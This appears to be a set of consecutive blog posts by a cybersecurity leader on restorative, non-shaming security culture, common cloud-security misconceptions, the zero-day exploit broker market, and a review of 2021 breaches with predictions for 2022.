Rethinking Cybersecurity: Challenging the Commoditisation and Embracing Restorative Practices
Since I started in Cybersecurity, I have observed that cybersecurity has become dominated by insincere vendors and practitioners driven solely by profit. As a cybersecurity leader, I have also noticed the increasing commoditisation of cybersecurity over the years, and it’s important for us to address this issue.
Going deeper into the motives, I realised the significance of my blog’s title. Initially, I chose the name to reflect the current state of cybersecurity, where my work felt repetitive and inconsequential, like an assembly line. However, regardless of the organisation, the same recurring non-technical issues persisted.
The primary challenge lies in the way security practitioners interact with the people they are meant to protect within these organisations. Those outside the security team are often victim-shamed and blamed for their perceived ignorance as if they are at fault for not prioritising cybersecurity in their daily work.
Security organisations sometimes oppress the very people they are meant to serve. This behaviour struck me as counterproductive and degrading, particularly as I familiarised myself with nonviolent communication and other conflict-resolution techniques. I wondered whether adopting peacebuilding methods could foster collaboration and alignment among stakeholders. While only a few security practitioners initially showed interest, the transition to DevOps and shift left strategy, emphasising these attributes, attracted like-minded individuals.
Additionally, the way users are treated is like the punitive and shaming approach commonly seen in the criminal justice system. However, this approach has not reduced crime or supported victims. On the other hand, restorative justice, which focuses on repairing the harm caused by crime and restoring the community while respecting the dignity of all involved parties, has shown promise.
Evidence suggests that traditional fear-based and shaming tactics have not effectively promoted user compliance in cybersecurity. Instead, creating a supportive workplace environment has been identified as a more practical approach to encouraging voluntary security behaviours.
In the rapidly evolving landscape of cybersecurity, organisations must adapt their approaches. Rather than relying on fear, uncertainty, and doubt (FUD)-based strategies, we must acknowledge the value of users as allies and reposition cybersecurity as a collaborative effort. This involves a fundamental shift in the industry, prioritising collaboration, understanding, and support to foster a culture of proactive cybersecurity measures. By moving away from fear-based tactics and embracing a more cooperative approach, organisations will be better equipped to mitigate threats and safeguard information.
I’m certain you’ve heard many concerns from CISOs who are struggling to gain visibility into cloud environments despite their considerable efforts and resources.
Many professionals face this common issue around the 6 to 8 months mark of organisations’ cloud transition journey. Despite significant time and resource investments, they begin to view the transition to the cloud as a costly misstep, largely due to the range of security challenges they confront.
These challenges often stem from a lack of understanding or misconceptions within the company about the nuances of cloud security.
I am consistently astonished by the widespread nature of these challenges!
Here are some of the common misunderstandings regarding security in the cloud.
“When in the cloud, it is absolutely secure.”
Since the transition to the cloud has become popular, senior leaders often claim that “the cloud is much more secure than on-premise infrastructure.” There is some truth to this perception. They are often presented with a slick PowerPoint presentation highlighting the security benefits of the cloud and the significant investments made by cloud providers to secure the environment.
It’s a common misconception that when organizations migrate to the cloud, they can relinquish responsibility for security to the cloud provider, like AWS, Google, or Microsoft. This mistaken belief leads them to think that simply moving their workloads to the cloud is sufficient. However, this oversight represents a critical security mistake because organisations still need to actively manage and maintain security measures in the cloud environment to ensure the protection of their data and infrastructure.
The operational model of cloud computing is based on a shared responsibility framework wherein the cloud provider assumes a significant portion of the responsibility for maintaining the infrastructure, ensuring physical security, and managing the underlying hardware and software. However, it’s important to understand that as a cloud user, you also bear the responsibility for configuring and securing your applications and data within the cloud environment.
This shared responsibility model is analogous to living in a rented property. The property owner is responsible for ensuring that the building is structurally sound and maintaining common areas, but as a tenant, you are responsible for securing your individual living space by locking doors and windows.
In the context of cloud computing, when you launch a server or deploy resources on the cloud, the cloud service provider does not automatically take over the task of securing your specific configuration and applications. Therefore, it’s essential to recognise that you must proactively implement robust security measures to protect your cloud assets.
Understanding this shared responsibility model is crucial before embarking on your cloud security program to ensure that you have a clear understanding of your role in maintaining a secure cloud environment.
The CLOUD is superior to On-Premises
Teams new to the cloud often hold biased views. Some assume that the cloud is inherently more secure than on-premises, while others believe it to be insecure and implement excessive controls. Making either mistake can lead to complacency and potential breaches, or make the work of cloud teams more difficult. This typically occurs when there’s a lack of investment in training the cybersecurity team in cloud security.
They often struggle to fully harness cloud technology’s potential and grapple with understanding its unique operational dynamics, leading to mounting frustration. It’s crucial to recognise that both cloud-based and on-premises infrastructures entail their own set of inherent risks. The key consideration lies not in the physical location of the infrastructure but rather in how it is effectively managed and safeguarded. Prioritising the upskilling of your cybersecurity team in cloud security before embarking on the migration process is essential, as this proactive approach ensures that your organisation is equipped to address potential security challenges from the outset.
We have carefully chosen a particular on-premises solution, and I am confident that it will seamlessly transition to the cloud.
It’s crucial to bear in mind that directly transferring on-premises solutions to the cloud and assuming identical outcomes is a grave error. Cloud environments possess unique attributes and necessitate specific configurations. Just because a solution functions effectively on-premises does not ensure that it will perform similarly in the cloud.
Migrating without essential adaptations can leave you vulnerable to unforeseen risks. Whenever feasible, it’s advisable to utilise native cloud solutions or opt for a cloud-based version of your on-premises tools, rather than expecting seamless universal compatibility.
Treating the Cloud Like a Project and Not an Environment
The Cloud is a different paradigm and a completely different approach to operations. It is not a one-time solution; you can’t just set it up and forget about it. Treating it like a project you complete and then hand over is a guaranteed way to invite a data breach.
When it comes to your IT infrastructure, it’s crucial to recognise that the cloud is an independent and vital environment that requires an equivalent level of governance compared to your on-premises setup. Many organisations make the mistake of treating cloud management as a secondary or tangential responsibility while focusing primarily on their on-premises systems. However, this approach underestimates the complexities and unique challenges of managing cloud-based resources.
It’s important to dedicate the necessary attention and resources to effectively govern and manage your cloud infrastructure in order to mitigate risks and ensure seamless operations.
It’s not my Role or Responsibility.
Assuming that the responsibilities for managing your on-premises environment will seamlessly transition to the cloud is a risky assumption to make. Many organisations overlook the critical task of clearly defining who will be responsible for implementing security controls, patching, monitoring, and other essential tasks in the cloud. This lack of clarity can lead to potentially disastrous consequences, leaving the organisation vulnerable to security breaches and operational inefficiencies.
It is important to establish a formally approved organisational chart that comprehensively outlines and assigns responsibilities for cloud security within your organisation. This ensures that all stakeholders understand their roles and accountabilities in safeguarding the organisation’s cloud infrastructure.
Furthermore, if your organisation intends to outsource a significant portion of its cloud-related activities, it is imperative to ensure that your organisational chart accurately reflects this strategic decision. This will help to align internal resources and clarify the division of responsibilities between the organisation and its external cloud service providers.
Conclusion
In the realm of cloud security, it’s crucial to address common misconceptions to ensure a robust and effective security posture. Organisations must understand that cloud security is a shared responsibility, requiring active management and maintenance of security measures within the cloud environment. Additionally, it’s important to recognise that both cloud-based and on-premises infrastructures entail inherent risks,
In the past, I have talked about zero-day vulnerabilities and the risks they pose. This post will focus on a grey market ecosystem, where zero-day exploits are bought and sold. To stay within the context, let me first define some key terms that will help us distinguish between the legality of this market.
Zero-day Vulnerability & Exploit
Zero-day vulnerabilities are flaws in system software or a device that has been disclosed but not yet patched by the creator. Because the creator of the software has not yet been discovered and patched, the zero-day vulnerabilities pose the high risk where a cybercriminal can take advantage for financial gain.
A zero-day exploit is software that takes advantage of these vulnerabilities. Merely creating an exploit and selling such software is not illegal. However, using such an exploit taking advantage for financial gain or causing harm is illegal.
Zero-day Brokers
Zero-brokers is the grey market ecosystem where zero-day exploits are bought and sold, often by governments secretly. Governments do this to ensure that no one else knows about these vulnerabilities, including the software creators. Since governments are involved, you guessed it right, there is a level of legitimacy to this market. The concept of good or bad is subjective and depends on which side of the table you are on.
The History of the “Market”
Like any other market, buying and selling zero-day exploits is the core of the business model. Therefore, the brokers (zero-day brokers market) have existed since the beginning of cyber warfare. As we were moving towards the Internet revolution, the data, famously called as “new oil” of this century. Zero-day exploits have become the most reliable way of exploiting vulnerabilities in the quest of seeking information. Some governments and private entities buy or sell these exploits to protect national interests and, in other cases, use these exploits to spy on the adversary. The market seems to be very small but very high value depending upon the exploit in question.
I came across a book from a New York Times cybersecurity and digital espionage journalist Nicole Perlroth; THIS IS HOW THEY TELL ME THE WORLD ENDS is an excellent account of the zero-day market. This well-researched book talks about the origins and the extent of this market. She notes in her accounts that it is hard to pinpoint the exact numbers that sell these exploits but even few that buy these exploits from these researchers. Even though the major buyers in this market are from law enforcement agencies worldwide, some private entities do indulge in buying.
The zero-day exploits market is predominantly for the valuable tools, which are to execute covert surgical operations. Recently, respective governments have tried to regulate the exploits market, but no matter what controls governments apply, we will always have a thriving black market selling zero-day exploits.
Nicole sites in her book the inability of Americans to protect against espionage attempts from Russia, China and North Korea, which prompted them to use zero-day exploits as a critical component of their response to the digital/cyber warfare. The Snowden leaks confirm that the US agencies were one of the biggest players in this market. Nicole shared a story of the two young hackers in the early days of this century who offered iDefense Research Lab, a threat intelligence company, a business model parallel to the blackhat hackers exploiting the vulnerabilities for-profit and cyber warfare. So, this was a kind of a model where whitehat hackers, with all their good intentions, were missing the buck due to the lack of acknowledgement of the creators. iDefense became the first company to buy bugs from these whitehat hackers to create a service that offers “threat intelligence” to companies such as banks that needed vulnerable business software and required protection against attacks. This kind of arrangement was the win-win proposition for the iDefense labs and the whitehat hackers.
In the early days, there was no market for iDefense. To develop this market, they started offering hackers monies for a laundry list of bugs, but at first, the bugs submitted were good for nothing. Even though they were thinking of letting the hackers go away, they needed to build trust. After 18 months or so, the hackers from Turkey, New Zealand and Argentina showed bugs that could exploit using antivirus, intercept passwords and steal data. As time passed, the program gained attention, and the company started getting calls from people in the government offering iDefense substantive amount of money in exchange for the bugs. The key to these discussions was not to inform the creators of the software of these vulnerabilities in exchange for the money. This opened up a whole new paradigm for these hackers, who would take a few hundred dollars a year earlier were asking for six-figure payouts. This created a whole new ecosystem of buyers and sellers known today as “zero-day brokers”.
The future of Zero-Day Brokers
As long as we will have software, we will have software vulnerabilities. Therefore, this ecosystem will persist. However, there could be some differences in the way the exploits are bought or sold. The value of these exploits could be different. The race, the cyber arm one, is becoming enormously competitive, and the governments worldwide are behaving so that there is no consequence of hacking an adversary country. It is becoming increasingly evident in the cybersecurity world that countries like the US, China, North Korea, Israel etc., are very much involved in cyber espionage and are finding new ways to stay ahead in the race. They will keep developing or buying exploits. Meanwhile, ordinary people will always be the last to know and the first ones impacted by a digital apocalypse. It sounds alarming, but what we are seeing in the cybersecurity world does not indicate anything but a potential digital catastrophe.
In this first post this year, I am taking out my crystal ball to predict the cybersecurity outlook in 2022 and beyond. If history could indicate the future, we would not see much of a difference from 2021
Amid the impending rise of infections from the Omicron variant of COVID19 globally and closer in Australia, I would like to wish you a happy new year 2022 through this first post of the year, trusting you all had a great start to the year.
The world has changed in the past two years due to the impacts of the pandemic and the slew of sophisticated cyber-attacks. In this first post this year, I am taking out my crystal ball to predict the cybersecurity outlook in 2022 and beyond. If history could indicate the future, let me summarise some of the cybersecurity events of the last twelve months.
Top cybersecurity events and breaches of 2021
COVID and cybersecurity threats:
Coronavirus and its various variants continued disrupting our lives in 2021, and bad actors upped their game to exploit this situation. The Ireland Health Service Executive (HSE) suffered a ransomware attack during the COVID’ second wave, disrupting patient care due to the lack of access to patient information. It is estimated that HSE spent in addition to $600 million in recovery costs, including the costs of the replacement and upgrade of the systems crippled by ransomware.
JBS Foods ransomware attack and ransom:
JBS Foods, a global meat processor, experienced a Ransomware attack attributed to REvil impacting their American and Australian operations. The company might have also paid $11 million in ransom to REvil.
A new zero-day vulnerability unlike any other from the past. No one can surely say if they are not impacted. The impact of this vulnerability is wide-ranging, impacting various applications using Apache Framework’s Log4J libraries. It will take some time before we can understand the long-term impact.
Colonial Pipeline, the largest fuel pipeline in the United States, suffered a data breach resulting from the DarkSide ransomware attack that hit their network in May 2021. The company, as a result, had to shut down their operations, triggering fuel shortages in the United States. During the incident, DarkSide operators also stole roughly 100GBs of files from breached Colonial Pipeline systems in about two hours.
SolarWinds:
We saw one of the most sophisticated supply chain attacks in recent times, early last year. A Russian hacking group, Cozy Bear, is attributed to the attack on the popular network management Orion platform. SolarWinds released multiple updates between March and May 2020, later identified as trojanised to install Sunburst backdoor. The SolarWind attack targeted US Government assets and a wide range of industries in the private sector.
Kaseya Supply Chain Attack:
Similar to the Solarwind Sunburst backdoor attack, another Russian hacking group REvil targeted Kaseya remote management platform to launch a ransomware attack on more than 2000 organisations globally last year.
Rise in Cybercrime:
A research organisation Cybersecurity Ventures estimates global cybercrime damage predicted to reach the US $10.5 trillion annually by 2025, up from the US $3 trillion in 2015.
Lack of Cybersecurity skills:
Cybersecurity careers have grown tremendously over the years, attributed to the increased cyber-attacks. Unfortunately, we cannot keep pace with the skills required to meet the challenge of defending applications, networks, infrastructure and people.
Increase in the amount of data needing protection:
We continue to see exponential growth in global data storage, which includes data stored in public and private infrastructure.
Hybrid work environment:
In these pandemic times, most people are working from home, which has opened up a new stream of cybersecurity challenges. This change seems to be permanent.
Predictions for 2022 & Beyond
In pandemic times, it is very difficult to predict what will happen the next day, let alone predict for the year ahead. However, let me take my crystal ball out and predict how I see cybersecurity trends for the next twelve months.
The ransomware challenge: Bad actors are getting very creative with launching ransomware attacks. With a proven business model for the bad actors, the ransomware attacks will continue to be rampant and challenging with the new ways of delivering malicious code.
Small and Medium Businesses (SMB): For a long time, large enterprises have been the prime focus for the bad actors. These enterprises have invested heavily to detect and respond to cyber-attack. It is getting difficult for the bad actors to launch cyberattacks against these enterprises successfully and, therefore, have shifted their focus on SMBs. SMBs often have fewer resources and, therefore, have to cut corners to prioritise cybersecurity, leaving them vulnerable to sophisticated attacks. We will see an increased number of attacks against SMBs in the year ahead.
Passwordless: With every new application, you may have to remember another password, which often means poor password management. We know that poorly managed passwords are targets that bad actors exploit to launch attacks. In the coming year, we will see an exponential increase in the adoption of the passwordless strategy.
Supply-Chain attack: Supply-chain attacks are going to be the norm in 2022. The bad actors will further exploit the already disrupted supply chain to extort ransom from the enterprises, threatening to exploit further their customers, similar to what we have seen in SolarWind and Kaseya attacks.
Cyber hygiene in the hybrid work environment: Enterprises will be focusing on improving cybersecurity awareness and skills to improve the security of their home IT environment. With the security-first approach in mind, we will see a significant improvement in the overall security at home.
Threat Hunting: More and more enterprises will increase their spending to improve or create threat hunting capabilities. Just as we see creative methods used by the hackers to exploit their victims, cyber teams have to develop capabilities to identify and stop bad actors from launching a successful cyber attack.
AI-powered phishing attacks: The quality of phishing attacks has increased tremendously over the years. Some of these attacks are “life-like”. Bad actors are now using AI to research targets to mimic their behaviours to impersonate in the phishing campaign. Enterprises must invest in anti-fraud education in 2022 to ensure that their employees can identify good emails from bad ones.
Software-defined (SD) world: Last few years have seen exponential growth in the software-defined world. We have seen tremendous adoption, whether a software-defined network, infrastructure, or application. 2022 will continue to see enterprises adopting SD technologies, including infrastructure as a code and serverless applications, which can be purpose-built, keeping security in mind.
Nation-state actors to target DevOps developers: Why would you bypass a security control if you can legitimately log in to the system? With increased adoption of the agile/DevOps methodologies, developer credentials have become the new “crown jewels” and most sort after. Hackers are targeting developers using various techniques to obtain privileged credentials. DevOps developers will continue to see being targeted this year.
2022 will continue to see nation-state threat actors exploit vulnerabilities with the ever-changing situations in regard to the dynamic geopolitical situation and similarly, scammers will be exploiting the COVID pandemic.
